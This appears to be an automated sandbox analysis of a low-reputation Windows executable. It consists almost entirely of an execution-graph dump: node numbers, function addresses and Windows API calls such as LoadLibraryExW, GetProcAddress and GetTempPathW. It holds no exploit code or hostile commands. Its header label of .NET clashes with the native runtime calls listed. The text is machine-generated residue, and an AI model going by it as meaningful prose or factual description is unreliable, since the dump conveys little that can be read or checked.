Programmed in: .Net C# or VB.NET
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 12.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 18.8%
Total number of Nodes: 2000
Total number of Limit Nodes: 71
15066->15067 15068 7ff614c89e48 __free_lconv_mon 11 API calls 15067->15068 15068->15069 15069->14906 15069->14907 15071 7ff614c842cb 15070->15071 15087 7ff614c8e384 15071->15087 15101 7ff614c7b8b0 SetUnhandledExceptionFilter 15079->15101 15100 7ff614c8f7b8 EnterCriticalSection 15087->15100 15103 7ff614c7c220 15102->15103 15103->14720 15103->15103 15106 7ff614c7764f 15104->15106 15105 7ff614c776a0 WideCharToMultiByte 15105->15106 15108 7ff614c77748 15105->15108 15106->15105 15107 7ff614c776f6 WideCharToMultiByte 15106->15107 15106->15108 15110 7ff614c77657 __std_exception_destroy 15106->15110 15107->15106 15107->15108 15376 7ff614c72620 15108->15376 15110->14724 15112 7ff614c8ec70 15111->15112 15114 7ff614c8ed16 15112->15114 15115 7ff614c8ecc3 15112->15115 15113 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15117 7ff614c8ecec 15113->15117 15773 7ff614c8eb48 15114->15773 15115->15113 15117->14726 15119 7ff614c71b05 15118->15119 15120 7ff614c71b20 15119->15120 15781 7ff614c724d0 15119->15781 15120->14761 15122 7ff614c73bc0 15120->15122 15123 7ff614c7ade0 15122->15123 15124 7ff614c73bcc GetModuleFileNameW 15123->15124 15125 7ff614c73bfb 15124->15125 15126 7ff614c73c12 15124->15126 15127 7ff614c72620 57 API calls 15125->15127 15821 7ff614c77b70 15126->15821 15129 7ff614c73c0e 15127->15129 15132 7ff614c7adb0 _wfindfirst32i64 8 API calls 15129->15132 15131 7ff614c72770 59 API calls 15131->15129 15133 7ff614c73c4f 15132->15133 15133->14732 15135 7ff614c71b30 49 API calls 15134->15135 15136 7ff614c73b5d 15135->15136 15136->14734 15138 7ff614c769ba 15137->15138 15139 7ff614c77a60 57 API calls 15138->15139 15140 7ff614c769dc GetEnvironmentVariableW 15139->15140 15141 7ff614c76a46 15140->15141 15142 7ff614c769f4 ExpandEnvironmentStringsW 15140->15142 15143 7ff614c7adb0 _wfindfirst32i64 8 API calls 15141->15143 15144 7ff614c77b70 59 API calls 15142->15144 15145 7ff614c76a58 15143->15145 15146 7ff614c76a1c 15144->15146 15145->14736 15146->15141 15147 7ff614c76a26 
15146->15147 15832 7ff614c8913c 15147->15832 15150 7ff614c7adb0 _wfindfirst32i64 8 API calls 15151 7ff614c76a3e 15150->15151 15151->14736 15153 7ff614c77a60 57 API calls 15152->15153 15154 7ff614c76fd7 SetEnvironmentVariableW 15153->15154 15155 7ff614c76fef __std_exception_destroy 15154->15155 15155->14740 15157 7ff614c71b30 49 API calls 15156->15157 15158 7ff614c71a00 15157->15158 15159 7ff614c71b30 49 API calls 15158->15159 15166 7ff614c71a7a 15158->15166 15160 7ff614c71a22 15159->15160 15161 7ff614c73b40 49 API calls 15160->15161 15160->15166 15162 7ff614c71a3b 15161->15162 15839 7ff614c717b0 15162->15839 15165 7ff614c7f2dc 74 API calls 15165->15166 15166->14743 15166->14745 15168 7ff614c75e75 15167->15168 15169 7ff614c738d0 15168->15169 15170 7ff614c724d0 59 API calls 15168->15170 15169->14764 15289 7ff614c75b00 15169->15289 15170->15169 15178 7ff614c731a3 15171->15178 15180 7ff614c731e4 15171->15180 15172 7ff614c73223 15174 7ff614c7adb0 _wfindfirst32i64 8 API calls 15172->15174 15173 7ff614c71ab0 74 API calls 15173->15180 15175 7ff614c73235 15174->15175 15175->14761 15181 7ff614c76f50 15175->15181 15178->15180 15912 7ff614c71440 15178->15912 15946 7ff614c729b0 15178->15946 16001 7ff614c71780 15178->16001 15180->15172 15180->15173 15182 7ff614c77a60 57 API calls 15181->15182 15183 7ff614c76f6f 15182->15183 15184 7ff614c77a60 57 API calls 15183->15184 15185 7ff614c76f7f 15184->15185 15186 7ff614c866e4 38 API calls 15185->15186 15187 7ff614c76f8d __std_exception_destroy 15186->15187 15187->14785 15189 7ff614c77010 15188->15189 15190 7ff614c77a60 57 API calls 15189->15190 15191 7ff614c77041 SetConsoleCtrlHandler GetStartupInfoW 15190->15191 15192 7ff614c770a2 15191->15192 16877 7ff614c891b4 15192->16877 15236 7ff614c72790 15235->15236 15237 7ff614c83c14 49 API calls 15236->15237 15238 7ff614c727db __scrt_get_show_window_mode 15237->15238 15239 7ff614c77a60 57 API calls 15238->15239 15240 7ff614c72810 15239->15240 15241 7ff614c7284d MessageBoxA 15240->15241 15242 
7ff614c72815 15240->15242 15244 7ff614c72867 15241->15244 15243 7ff614c77a60 57 API calls 15242->15243 15245 7ff614c7282f MessageBoxW 15243->15245 15246 7ff614c7adb0 _wfindfirst32i64 8 API calls 15244->15246 15245->15244 15247 7ff614c72877 15246->15247 15247->14761 15249 7ff614c73cdc 15248->15249 15250 7ff614c77a60 57 API calls 15249->15250 15251 7ff614c73d07 15250->15251 15252 7ff614c77a60 57 API calls 15251->15252 15253 7ff614c73d1a 15252->15253 16933 7ff614c854f8 15253->16933 15256 7ff614c7adb0 _wfindfirst32i64 8 API calls 15257 7ff614c737fa 15256->15257 15257->14765 15258 7ff614c77230 15257->15258 15259 7ff614c77254 15258->15259 15260 7ff614c7732b __std_exception_destroy 15259->15260 15261 7ff614c7f964 73 API calls 15259->15261 15260->14768 15262 7ff614c7726e 15261->15262 15262->15260 17312 7ff614c87968 15262->17312 15264 7ff614c77283 15264->15260 15265 7ff614c7f964 73 API calls 15264->15265 15266 7ff614c7f62c _fread_nolock 53 API calls 15264->15266 15265->15264 15266->15264 15268 7ff614c7f30c 15267->15268 17327 7ff614c7f0b8 15268->17327 15270 7ff614c7f325 15270->14765 15272 7ff614c732e0 15271->15272 15274 7ff614c732b7 15271->15274 15272->14746 15273 7ff614c71780 59 API calls 15273->15274 15274->15272 15274->15273 15276 7ff614c77b07 MultiByteToWideChar 15275->15276 15277 7ff614c77a81 MultiByteToWideChar 15275->15277 15278 7ff614c77b2a 15276->15278 15279 7ff614c77b4f 15276->15279 15280 7ff614c77aa7 15277->15280 15285 7ff614c77acc 15277->15285 15281 7ff614c72620 55 API calls 15278->15281 15279->14751 15282 7ff614c72620 55 API calls 15280->15282 15283 7ff614c77b3d 15281->15283 15284 7ff614c77aba 15282->15284 15283->14751 15284->14751 15285->15276 15286 7ff614c77ae2 15285->15286 15287 7ff614c72620 55 API calls 15286->15287 15288 7ff614c77af5 15287->15288 15288->14751 15290 7ff614c75b24 15289->15290 15294 7ff614c75b51 15289->15294 15291 7ff614c75b4c 15290->15291 15292 7ff614c71780 59 API calls 15290->15292 15290->15294 15298 7ff614c75b47 memcpy_s 
__std_exception_destroy 15290->15298 17338 7ff614c712b0 15291->17338 15292->15290 15294->15298 17364 7ff614c73d50 15294->17364 15296 7ff614c75bb7 15297 7ff614c72770 59 API calls 15296->15297 15296->15298 15297->15298 15298->14770 15313 7ff614c7567a memcpy_s 15299->15313 15301 7ff614c7579f 15303 7ff614c73d50 49 API calls 15301->15303 15302 7ff614c757bb 15305 7ff614c72770 59 API calls 15302->15305 15304 7ff614c75818 15303->15304 15308 7ff614c73d50 49 API calls 15304->15308 15309 7ff614c757b1 __std_exception_destroy 15305->15309 15306 7ff614c73d50 49 API calls 15306->15313 15307 7ff614c75780 15307->15301 15310 7ff614c73d50 49 API calls 15307->15310 15311 7ff614c75848 15308->15311 15312 7ff614c7adb0 _wfindfirst32i64 8 API calls 15309->15312 15310->15301 15316 7ff614c73d50 49 API calls 15311->15316 15314 7ff614c738f9 15312->15314 15313->15301 15313->15302 15313->15306 15313->15307 15313->15313 15315 7ff614c71440 161 API calls 15313->15315 15317 7ff614c757a1 15313->15317 17367 7ff614c71650 15313->17367 15314->14779 15319 7ff614c755e0 15314->15319 15315->15313 15316->15309 15318 7ff614c72770 59 API calls 15317->15318 15318->15309 17372 7ff614c771e0 15319->17372 15321 7ff614c755fc 15322 7ff614c771e0 58 API calls 15321->15322 15323 7ff614c7560f 15322->15323 15324 7ff614c75645 15323->15324 15325 7ff614c75627 15323->15325 15326 7ff614c72770 59 API calls 15324->15326 17376 7ff614c75f70 GetProcAddress 15325->17376 15328 7ff614c73907 15326->15328 15328->14779 15328->14787 15336 7ff614c71b55 15335->15336 15337 7ff614c83c14 49 API calls 15336->15337 15338 7ff614c71b78 15337->15338 15338->14786 17435 7ff614c74980 15339->17435 15342 7ff614c7311d 15342->14791 15344 7ff614c730f4 15344->15342 17491 7ff614c74700 15344->17491 15395 7ff614c7ade0 15376->15395 15379 7ff614c72669 15397 7ff614c83c14 15379->15397 15384 7ff614c71b30 49 API calls 15385 7ff614c726c6 __scrt_get_show_window_mode 15384->15385 15386 7ff614c77a60 54 API calls 15385->15386 15387 7ff614c726fb 15386->15387 15388 
7ff614c72738 MessageBoxA 15387->15388 15389 7ff614c72700 15387->15389 15391 7ff614c72752 15388->15391 15390 7ff614c77a60 54 API calls 15389->15390 15392 7ff614c7271a MessageBoxW 15390->15392 15393 7ff614c7adb0 _wfindfirst32i64 8 API calls 15391->15393 15392->15391 15394 7ff614c72762 15393->15394 15394->15110 15396 7ff614c7263c GetLastError 15395->15396 15396->15379 15399 7ff614c83c6e 15397->15399 15398 7ff614c83c93 15401 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15398->15401 15399->15398 15400 7ff614c83ccf 15399->15400 15427 7ff614c81ea0 15400->15427 15414 7ff614c83cbd 15401->15414 15403 7ff614c83dac 15406 7ff614c89e48 __free_lconv_mon 11 API calls 15403->15406 15405 7ff614c7adb0 _wfindfirst32i64 8 API calls 15407 7ff614c72697 15405->15407 15406->15414 15415 7ff614c774e0 15407->15415 15408 7ff614c83d81 15412 7ff614c89e48 __free_lconv_mon 11 API calls 15408->15412 15409 7ff614c83dd0 15409->15403 15411 7ff614c83dda 15409->15411 15410 7ff614c83d78 15410->15403 15410->15408 15413 7ff614c89e48 __free_lconv_mon 11 API calls 15411->15413 15412->15414 15413->15414 15414->15405 15416 7ff614c774ec 15415->15416 15417 7ff614c7750d FormatMessageW 15416->15417 15418 7ff614c77507 GetLastError 15416->15418 15419 7ff614c7755c WideCharToMultiByte 15417->15419 15420 7ff614c77540 15417->15420 15418->15417 15422 7ff614c77596 15419->15422 15424 7ff614c77553 15419->15424 15421 7ff614c72620 54 API calls 15420->15421 15421->15424 15423 7ff614c72620 54 API calls 15422->15423 15423->15424 15425 7ff614c7adb0 _wfindfirst32i64 8 API calls 15424->15425 15426 7ff614c7269e 15425->15426 15426->15384 15428 7ff614c81ede 15427->15428 15433 7ff614c81ece 15427->15433 15429 7ff614c81ee7 15428->15429 15439 7ff614c81f15 15428->15439 15432 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15429->15432 15430 7ff614c81f0d 15430->15403 15430->15408 15430->15409 15430->15410 15431 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15431->15430 15432->15430 15433->15431 15436 7ff614c821c4 15438 
7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15436->15438 15438->15433 15439->15430 15439->15433 15439->15436 15441 7ff614c82830 15439->15441 15467 7ff614c824f8 15439->15467 15497 7ff614c81d80 15439->15497 15500 7ff614c83a50 15439->15500 15442 7ff614c828e5 15441->15442 15443 7ff614c82872 15441->15443 15446 7ff614c828ea 15442->15446 15447 7ff614c8293f 15442->15447 15444 7ff614c82878 15443->15444 15445 7ff614c8290f 15443->15445 15452 7ff614c8287d 15444->15452 15455 7ff614c8294e 15444->15455 15524 7ff614c80de0 15445->15524 15448 7ff614c828ec 15446->15448 15449 7ff614c8291f 15446->15449 15447->15445 15447->15455 15457 7ff614c828a8 15447->15457 15451 7ff614c8288d 15448->15451 15459 7ff614c828fb 15448->15459 15531 7ff614c809d0 15449->15531 15466 7ff614c8297d 15451->15466 15506 7ff614c83194 15451->15506 15452->15451 15456 7ff614c828c0 15452->15456 15452->15457 15455->15466 15538 7ff614c811f0 15455->15538 15456->15466 15516 7ff614c83650 15456->15516 15457->15466 15545 7ff614c8da30 15457->15545 15459->15445 15460 7ff614c82900 15459->15460 15460->15466 15520 7ff614c837e8 15460->15520 15462 7ff614c7adb0 _wfindfirst32i64 8 API calls 15464 7ff614c82c13 15462->15464 15464->15439 15466->15462 15468 7ff614c82519 15467->15468 15469 7ff614c82503 15467->15469 15470 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15468->15470 15473 7ff614c82557 15468->15473 15471 7ff614c828e5 15469->15471 15472 7ff614c82872 15469->15472 15469->15473 15470->15473 15476 7ff614c828ea 15471->15476 15477 7ff614c8293f 15471->15477 15474 7ff614c82878 15472->15474 15475 7ff614c8290f 15472->15475 15473->15439 15484 7ff614c8287d 15474->15484 15486 7ff614c8294e 15474->15486 15480 7ff614c80de0 38 API calls 15475->15480 15478 7ff614c828ec 15476->15478 15479 7ff614c8291f 15476->15479 15477->15475 15477->15486 15495 7ff614c828a8 15477->15495 15481 7ff614c8288d 15478->15481 15488 7ff614c828fb 15478->15488 15482 7ff614c809d0 38 API calls 15479->15482 15480->15495 15483 7ff614c83194 47 API calls 15481->15483 
15496 7ff614c8297d 15481->15496 15482->15495 15483->15495 15484->15481 15485 7ff614c828c0 15484->15485 15484->15495 15490 7ff614c83650 47 API calls 15485->15490 15485->15496 15487 7ff614c811f0 38 API calls 15486->15487 15486->15496 15487->15495 15488->15475 15489 7ff614c82900 15488->15489 15492 7ff614c837e8 37 API calls 15489->15492 15489->15496 15490->15495 15491 7ff614c7adb0 _wfindfirst32i64 8 API calls 15493 7ff614c82c13 15491->15493 15492->15495 15493->15439 15494 7ff614c8da30 47 API calls 15494->15495 15495->15494 15495->15496 15496->15491 15701 7ff614c7ffa4 15497->15701 15501 7ff614c83a67 15500->15501 15718 7ff614c8cb90 15501->15718 15507 7ff614c831b6 15506->15507 15555 7ff614c7fe10 15507->15555 15512 7ff614c8337c 15512->15457 15513 7ff614c832f3 15513->15512 15515 7ff614c83a50 45 API calls 15513->15515 15514 7ff614c83a50 45 API calls 15514->15513 15515->15512 15517 7ff614c83668 15516->15517 15519 7ff614c836d0 15516->15519 15518 7ff614c8da30 47 API calls 15517->15518 15517->15519 15518->15519 15519->15457 15521 7ff614c83809 15520->15521 15522 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15521->15522 15523 7ff614c8383a 15521->15523 15522->15523 15523->15457 15525 7ff614c80e13 15524->15525 15526 7ff614c80e42 15525->15526 15528 7ff614c80eff 15525->15528 15527 7ff614c7fe10 12 API calls 15526->15527 15530 7ff614c80e7f 15526->15530 15527->15530 15529 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15528->15529 15529->15530 15530->15457 15532 7ff614c80a03 15531->15532 15533 7ff614c80a32 15532->15533 15535 7ff614c80aef 15532->15535 15534 7ff614c7fe10 12 API calls 15533->15534 15537 7ff614c80a6f 15533->15537 15534->15537 15536 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15535->15536 15536->15537 15537->15457 15539 7ff614c81223 15538->15539 15540 7ff614c81252 15539->15540 15542 7ff614c8130f 15539->15542 15541 7ff614c7fe10 12 API calls 15540->15541 15544 7ff614c8128f 15540->15544 15541->15544 15543 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 
15542->15543 15543->15544 15544->15457 15546 7ff614c8da58 15545->15546 15547 7ff614c8da9d 15546->15547 15549 7ff614c83a50 45 API calls 15546->15549 15551 7ff614c8da5d __scrt_get_show_window_mode 15546->15551 15554 7ff614c8da86 __scrt_get_show_window_mode 15546->15554 15547->15551 15547->15554 15698 7ff614c8f0e8 15547->15698 15548 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15548->15551 15549->15547 15551->15457 15554->15548 15554->15551 15556 7ff614c7fe47 15555->15556 15561 7ff614c7fe36 15555->15561 15556->15561 15585 7ff614c8cafc 15556->15585 15559 7ff614c89e48 __free_lconv_mon 11 API calls 15559->15561 15560 7ff614c89e48 __free_lconv_mon 11 API calls 15562 7ff614c7fe88 15560->15562 15563 7ff614c8d748 15561->15563 15562->15559 15564 7ff614c8d765 15563->15564 15565 7ff614c8d798 15563->15565 15566 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15564->15566 15565->15564 15567 7ff614c8d7ca 15565->15567 15575 7ff614c832d1 15566->15575 15571 7ff614c8d8dd 15567->15571 15580 7ff614c8d812 15567->15580 15568 7ff614c8d9cf 15625 7ff614c8cc34 15568->15625 15570 7ff614c8d995 15618 7ff614c8cfcc 15570->15618 15571->15568 15571->15570 15572 7ff614c8d964 15571->15572 15574 7ff614c8d927 15571->15574 15577 7ff614c8d91d 15571->15577 15611 7ff614c8d2ac 15572->15611 15601 7ff614c8d4dc 15574->15601 15575->15513 15575->15514 15577->15570 15579 7ff614c8d922 15577->15579 15579->15572 15579->15574 15580->15575 15592 7ff614c891dc 15580->15592 15583 7ff614c89e00 _wfindfirst32i64 17 API calls 15584 7ff614c8da2c 15583->15584 15586 7ff614c8cb47 15585->15586 15590 7ff614c8cb0b _set_fmode 15585->15590 15587 7ff614c84474 _set_fmode 11 API calls 15586->15587 15589 7ff614c7fe74 15587->15589 15588 7ff614c8cb2e RtlAllocateHeap 15588->15589 15588->15590 15589->15560 15589->15562 15590->15586 15590->15588 15591 7ff614c926e0 _set_fmode 2 API calls 15590->15591 15591->15590 15593 7ff614c891f3 15592->15593 15594 7ff614c891e9 15592->15594 15595 7ff614c84474 _set_fmode 11 API calls 15593->15595 
15594->15593 15599 7ff614c8920e 15594->15599 15596 7ff614c891fa 15595->15596 15597 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15596->15597 15598 7ff614c89206 15597->15598 15598->15575 15598->15583 15599->15598 15600 7ff614c84474 _set_fmode 11 API calls 15599->15600 15600->15596 15634 7ff614c931fc 15601->15634 15605 7ff614c8d588 15605->15575 15606 7ff614c8d5d9 15687 7ff614c8d0c8 15606->15687 15607 7ff614c8d584 15607->15605 15607->15606 15609 7ff614c8d5a4 15607->15609 15683 7ff614c8d384 15609->15683 15612 7ff614c931fc 38 API calls 15611->15612 15613 7ff614c8d2f6 15612->15613 15614 7ff614c92c44 37 API calls 15613->15614 15615 7ff614c8d346 15614->15615 15616 7ff614c8d34a 15615->15616 15617 7ff614c8d384 45 API calls 15615->15617 15616->15575 15617->15616 15619 7ff614c931fc 38 API calls 15618->15619 15620 7ff614c8d017 15619->15620 15621 7ff614c92c44 37 API calls 15620->15621 15622 7ff614c8d06f 15621->15622 15623 7ff614c8d073 15622->15623 15624 7ff614c8d0c8 45 API calls 15622->15624 15623->15575 15624->15623 15626 7ff614c8cc79 15625->15626 15627 7ff614c8ccac 15625->15627 15628 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15626->15628 15629 7ff614c8ccc4 15627->15629 15631 7ff614c8cd45 15627->15631 15633 7ff614c8cca5 __scrt_get_show_window_mode 15628->15633 15630 7ff614c8cfcc 46 API calls 15629->15630 15630->15633 15632 7ff614c83a50 45 API calls 15631->15632 15631->15633 15632->15633 15633->15575 15635 7ff614c9324f fegetenv 15634->15635 15636 7ff614c9715c 37 API calls 15635->15636 15641 7ff614c932a2 15636->15641 15637 7ff614c932cf 15640 7ff614c891dc __std_exception_copy 37 API calls 15637->15640 15638 7ff614c93392 15639 7ff614c9715c 37 API calls 15638->15639 15642 7ff614c933bc 15639->15642 15643 7ff614c9334d 15640->15643 15641->15638 15644 7ff614c932bd 15641->15644 15645 7ff614c9336c 15641->15645 15646 7ff614c9715c 37 API calls 15642->15646 15647 7ff614c94474 15643->15647 15653 7ff614c93355 15643->15653 15644->15637 15644->15638 15648 7ff614c891dc 
__std_exception_copy 37 API calls 15645->15648 15649 7ff614c933cd 15646->15649 15651 7ff614c89e00 _wfindfirst32i64 17 API calls 15647->15651 15648->15643 15650 7ff614c97350 20 API calls 15649->15650 15660 7ff614c93436 __scrt_get_show_window_mode 15650->15660 15652 7ff614c94489 15651->15652 15654 7ff614c7adb0 _wfindfirst32i64 8 API calls 15653->15654 15655 7ff614c8d529 15654->15655 15679 7ff614c92c44 15655->15679 15656 7ff614c937df __scrt_get_show_window_mode 15657 7ff614c93b1f 15658 7ff614c92d60 37 API calls 15657->15658 15665 7ff614c94237 15658->15665 15659 7ff614c93acb 15659->15657 15662 7ff614c9448c memcpy_s 37 API calls 15659->15662 15660->15656 15661 7ff614c93477 memcpy_s 15660->15661 15663 7ff614c84474 _set_fmode 11 API calls 15660->15663 15675 7ff614c938d3 memcpy_s __scrt_get_show_window_mode 15661->15675 15678 7ff614c93dbb memcpy_s __scrt_get_show_window_mode 15661->15678 15662->15657 15664 7ff614c938b0 15663->15664 15666 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15664->15666 15668 7ff614c9448c memcpy_s 37 API calls 15665->15668 15672 7ff614c94292 15665->15672 15666->15661 15667 7ff614c94418 15670 7ff614c9715c 37 API calls 15667->15670 15668->15672 15669 7ff614c84474 11 API calls _set_fmode 15669->15678 15670->15653 15671 7ff614c84474 11 API calls _set_fmode 15671->15675 15672->15667 15673 7ff614c92d60 37 API calls 15672->15673 15677 7ff614c9448c memcpy_s 37 API calls 15672->15677 15673->15672 15674 7ff614c89de0 37 API calls _invalid_parameter_noinfo 15674->15678 15675->15659 15675->15671 15676 7ff614c89de0 37 API calls _invalid_parameter_noinfo 15675->15676 15676->15675 15677->15672 15678->15657 15678->15659 15678->15669 15678->15674 15680 7ff614c92c63 15679->15680 15681 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15680->15681 15682 7ff614c92c8e memcpy_s 15680->15682 15681->15682 15682->15607 15684 7ff614c8d3b0 memcpy_s 15683->15684 15685 7ff614c83a50 45 API calls 15684->15685 15686 7ff614c8d46a memcpy_s __scrt_get_show_window_mode 
15684->15686 15685->15686 15686->15605 15688 7ff614c8d103 15687->15688 15691 7ff614c8d150 memcpy_s 15687->15691 15689 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15688->15689 15690 7ff614c8d12f 15689->15690 15690->15605 15693 7ff614c8d1bb 15691->15693 15694 7ff614c83a50 45 API calls 15691->15694 15692 7ff614c891dc __std_exception_copy 37 API calls 15697 7ff614c8d1fd memcpy_s 15692->15697 15693->15692 15694->15693 15695 7ff614c89e00 _wfindfirst32i64 17 API calls 15696 7ff614c8d2a8 15695->15696 15697->15695 15699 7ff614c8f10c WideCharToMultiByte 15698->15699 15702 7ff614c7ffe3 15701->15702 15703 7ff614c7ffd1 15701->15703 15705 7ff614c7fff0 15702->15705 15709 7ff614c8002d 15702->15709 15704 7ff614c84474 _set_fmode 11 API calls 15703->15704 15706 7ff614c7ffd6 15704->15706 15707 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15705->15707 15708 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15706->15708 15713 7ff614c7ffe1 15707->15713 15708->15713 15710 7ff614c800d6 15709->15710 15711 7ff614c84474 _set_fmode 11 API calls 15709->15711 15712 7ff614c84474 _set_fmode 11 API calls 15710->15712 15710->15713 15714 7ff614c800cb 15711->15714 15715 7ff614c80180 15712->15715 15713->15439 15716 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15714->15716 15717 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15715->15717 15716->15710 15717->15713 15719 7ff614c83a8f 15718->15719 15720 7ff614c8cba9 15718->15720 15722 7ff614c8cbfc 15719->15722 15720->15719 15726 7ff614c92454 15720->15726 15723 7ff614c8cc15 15722->15723 15724 7ff614c83a9f 15722->15724 15723->15724 15770 7ff614c917c0 15723->15770 15724->15439 15738 7ff614c8a650 GetLastError 15726->15738 15729 7ff614c924ae 15729->15719 15739 7ff614c8a691 FlsSetValue 15738->15739 15740 7ff614c8a674 FlsGetValue 15738->15740 15742 7ff614c8a6a3 15739->15742 15757 7ff614c8a681 15739->15757 15741 7ff614c8a68b 15740->15741 15740->15757 15741->15739 15744 7ff614c8dd70 _set_fmode 11 API calls 15742->15744 15743 
7ff614c8a6fd SetLastError 15745 7ff614c8a70a 15743->15745 15746 7ff614c8a71d 15743->15746 15747 7ff614c8a6b2 15744->15747 15745->15729 15760 7ff614c8f7b8 EnterCriticalSection 15745->15760 15761 7ff614c8923c 15746->15761 15749 7ff614c8a6d0 FlsSetValue 15747->15749 15750 7ff614c8a6c0 FlsSetValue 15747->15750 15752 7ff614c8a6ee 15749->15752 15753 7ff614c8a6dc FlsSetValue 15749->15753 15751 7ff614c8a6c9 15750->15751 15755 7ff614c89e48 __free_lconv_mon 11 API calls 15751->15755 15756 7ff614c8a3f4 _set_fmode 11 API calls 15752->15756 15753->15751 15755->15757 15758 7ff614c8a6f6 15756->15758 15757->15743 15759 7ff614c89e48 __free_lconv_mon 11 API calls 15758->15759 15759->15743 15762 7ff614c927a0 __FrameHandler3::FrameUnwindToEmptyState EnterCriticalSection LeaveCriticalSection 15761->15762 15764 7ff614c89245 15762->15764 15763 7ff614c89254 15766 7ff614c89287 __FrameHandler3::FrameUnwindToEmptyState 15763->15766 15767 7ff614c8925d IsProcessorFeaturePresent 15763->15767 15764->15763 15765 7ff614c927f0 __FrameHandler3::FrameUnwindToEmptyState 44 API calls 15764->15765 15765->15763 15768 7ff614c8926c 15767->15768 15769 7ff614c89b14 _wfindfirst32i64 14 API calls 15768->15769 15769->15766 15771 7ff614c8a650 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 15770->15771 15772 7ff614c917c9 15771->15772 15780 7ff614c8431c EnterCriticalSection 15773->15780 15782 7ff614c724ec 15781->15782 15783 7ff614c83c14 49 API calls 15782->15783 15784 7ff614c7253d 15783->15784 15785 7ff614c84474 _set_fmode 11 API calls 15784->15785 15786 7ff614c72542 15785->15786 15800 7ff614c84494 15786->15800 15789 7ff614c71b30 49 API calls 15790 7ff614c72571 __scrt_get_show_window_mode 15789->15790 15791 7ff614c77a60 57 API calls 15790->15791 15792 7ff614c725a6 15791->15792 15793 7ff614c725ab 15792->15793 15794 7ff614c725e3 MessageBoxA 15792->15794 15796 7ff614c77a60 57 API calls 15793->15796 15795 7ff614c725fd 15794->15795 15798 7ff614c7adb0 _wfindfirst32i64 8 API calls 15795->15798 15797 7ff614c725c5 
MessageBoxW 15796->15797 15797->15795 15799 7ff614c7260d 15798->15799 15799->15120 15801 7ff614c8a7c8 _set_fmode 11 API calls 15800->15801 15802 7ff614c844ab 15801->15802 15803 7ff614c8dd70 _set_fmode 11 API calls 15802->15803 15805 7ff614c844eb 15802->15805 15809 7ff614c72549 15802->15809 15804 7ff614c844e0 15803->15804 15806 7ff614c89e48 __free_lconv_mon 11 API calls 15804->15806 15805->15809 15812 7ff614c8e448 15805->15812 15806->15805 15809->15789 15810 7ff614c89e00 _wfindfirst32i64 17 API calls 15811 7ff614c84530 15810->15811 15815 7ff614c8e465 15812->15815 15813 7ff614c8e46a 15814 7ff614c84474 _set_fmode 11 API calls 15813->15814 15817 7ff614c84511 15813->15817 15820 7ff614c8e474 15814->15820 15815->15813 15815->15817 15818 7ff614c8e4b4 15815->15818 15816 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15816->15817 15817->15809 15817->15810 15818->15817 15819 7ff614c84474 _set_fmode 11 API calls 15818->15819 15819->15820 15820->15816 15822 7ff614c77b94 WideCharToMultiByte 15821->15822 15823 7ff614c77c02 WideCharToMultiByte 15821->15823 15826 7ff614c77bd5 15822->15826 15827 7ff614c77bbe 15822->15827 15824 7ff614c73c25 15823->15824 15825 7ff614c77c2f 15823->15825 15824->15129 15824->15131 15828 7ff614c72620 57 API calls 15825->15828 15826->15823 15830 7ff614c77beb 15826->15830 15829 7ff614c72620 57 API calls 15827->15829 15828->15824 15829->15824 15831 7ff614c72620 57 API calls 15830->15831 15831->15824 15833 7ff614c89153 15832->15833 15836 7ff614c76a2e 15832->15836 15834 7ff614c891dc __std_exception_copy 37 API calls 15833->15834 15833->15836 15835 7ff614c89180 15834->15835 15835->15836 15837 7ff614c89e00 _wfindfirst32i64 17 API calls 15835->15837 15836->15150 15838 7ff614c891b0 15837->15838 15840 7ff614c717d4 15839->15840 15841 7ff614c717e4 15839->15841 15842 7ff614c73cd0 116 API calls 15840->15842 15843 7ff614c77230 83 API calls 15841->15843 15872 7ff614c71842 15841->15872 15842->15841 15844 7ff614c71815 15843->15844 15844->15872 15873 7ff614c7f964 
[Execution graph residue: the sandbox's call-graph edges (node ids and "a->b" links between function addresses) are omitted here; only the recoverable information, the Windows API calls attributed to each function address in the graph, is kept below.]

Windows API calls observed in the execution graph (function address: API):
7ff614c7682d: GetTempPathW
7ff614c764e9: ExpandEnvironmentStringsW
7ff614c771f7: LoadLibraryExW
7ff614c75fbc, 7ff614c75fe1, 7ff614c76006: GetProcAddress
7ff614c73e10, 7ff614c73e5b, 7ff614c73e80, 7ff614c73ea5, 7ff614c73ecd, 7ff614c73ef5, 7ff614c73f1d, 7ff614c73f45, 7ff614c73f6d: GetProcAddress
7ff614c7af58: IsProcessorFeaturePresent
7ff614c7aff4: RtlCaptureContext, RtlLookupFunctionEntry
7ff614c7b024: RtlVirtualUnwind
7ff614c7ae30: SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
7ff614c846fa: CreateFileW
7ff614c84804: GetFileType
7ff614c8487e: GetFileInformationByHandle
7ff614c8492a: GetLastError
7ff614c8495c: PeekNamedPipe
7ff614c8de75: LoadLibraryW
7ff614c8de9a: GetLastError
7ff614c8ded4: LoadLibraryExW
7ff614c8df61: FreeLibrary
7ff614c8df6a: GetProcAddress
7ff614c8e829: MultiByteToWideChar
7ff614c8f0e8: WideCharToMultiByte
7ff614c8e26b: LCMapStringW
7ff614c920b2: GetStringTypeW
7ff614c8431c, 7ff614c8f7b8: EnterCriticalSection
7ff614c8a735: FlsGetValue
